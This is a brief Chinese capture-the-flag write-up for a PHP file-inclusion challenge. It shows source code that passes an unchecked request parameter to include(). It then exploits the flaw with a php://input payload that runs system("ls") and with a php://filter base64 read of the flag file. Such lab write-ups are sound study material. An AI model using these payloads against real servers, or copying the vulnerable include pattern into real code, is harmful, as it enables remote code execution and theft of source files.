i春秋 WEB include
一天一道CTF题目,能多不能少
打开网页发现源码,而且什么都没有过滤~:
<?php
show_source(__FILE__);
if(isset($_REQUEST['path'])){
include($_REQUEST['path']);
}else{
include('phpinfo.php');
}
还出现phpinfo页面:
看题目也能猜到是文件包含,关键是如何知道文件的名字呢?
搜索一下allow_url_include
看看是否打开:
打开的,可以使用php://input协议,使用post传递参数<?php system("ls");?>
得到:
直接使用php://filter/read=convert.base64-encode/resource=dle345aae.php
读取文件内容:
解码:
还可以直接继续使用php://input
:
一样能够得到flag!!!